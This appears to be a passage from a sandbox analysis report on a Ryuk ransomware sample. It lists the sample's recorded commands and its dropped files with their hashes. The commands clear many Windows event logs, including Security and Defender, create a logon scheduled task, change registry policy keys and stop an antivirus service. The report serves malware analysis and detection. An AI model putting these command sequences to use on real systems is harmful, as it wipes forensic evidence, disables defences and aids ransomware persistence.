C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TunnelDriver"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WUSA/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Power"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Render"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ntshrui"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "OAlerts"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Security"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Setup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "System"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "TabletPC_InputPanel_Channel"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSetup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSyncEngine"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Windows PowerShell"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "muxencode"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\net.exenet stop avpsus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txtFilesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA5125e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
C:\ProgramData\RYUKIDFilesize
8B
MD59c2ac4bed585b59bfd5cd797bf7f9f96
SHA1f70dd2b190d6dc2537d9797041155cbffe94c37b
SHA2561774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35
SHA51255f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1
-
C:\ProgramData\RyukReadMe.htmlFilesize
152B
MD5a641bf8ac8307aad57ecab53872e67db
SHA16fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA2569383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA5127d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4
-
C:\ProgramData\RyukReadMe.html.[Vulcanteam@CYBERFEAR.COM].RYKFilesize
858B
MD54b50035e27e1d6ce815243181bf2566d
SHA1e4d79b2b99ba166924e39c5231b2a814503c1440
SHA2561f8eefea2f1df6c92e2a70bbdecace76686f62d3ac58f182f4eb66008a29bc0f
SHA512ff6450dc7fcd80f0882af38915ee714488356b6c664c4ee5f358732eb916b9832e1cbe08975c3a32c925ef314680f32822ade29ed5bc60f5c3f0500e6c69aa51
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA5125e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5a967c36c1b87375882710936daa98ff3
SHA1c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
SHA256eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
SHA512d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5a967c36c1b87375882710936daa98ff3
SHA1c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
SHA256eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
SHA512d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5a967c36c1b87375882710936daa98ff3
SHA1c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
SHA256eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
SHA512d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
-
C:\ProgramData\hrmlog2Filesize
292B
MD5c8d691d74fbebbd6e92f6c805f48af65
SHA172bc5685a81374cd18394ae2fae1276b7a4189f6
SHA256912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
SHA5129a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
-
C:\ProgramData\hrmlog2Filesize
292B
MD5c8d691d74fbebbd6e92f6c805f48af65
SHA172bc5685a81374cd18394ae2fae1276b7a4189f6
SHA256912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
SHA5129a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
-
C:\ProgramData\hrmlog2Filesize
292B
MD5c8d691d74fbebbd6e92f6c805f48af65
SHA172bc5685a81374cd18394ae2fae1276b7a4189f6
SHA256912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
SHA5129a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD59c2ac4bed585b59bfd5cd797bf7f9f96
SHA1f70dd2b190d6dc2537d9797041155cbffe94c37b
SHA2561774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35
SHA51255f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD5a967c36c1b87375882710936daa98ff3
SHA1c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
SHA256eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
SHA512d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD5c8d691d74fbebbd6e92f6c805f48af65
SHA172bc5685a81374cd18394ae2fae1276b7a4189f6
SHA256912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
SHA5129a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42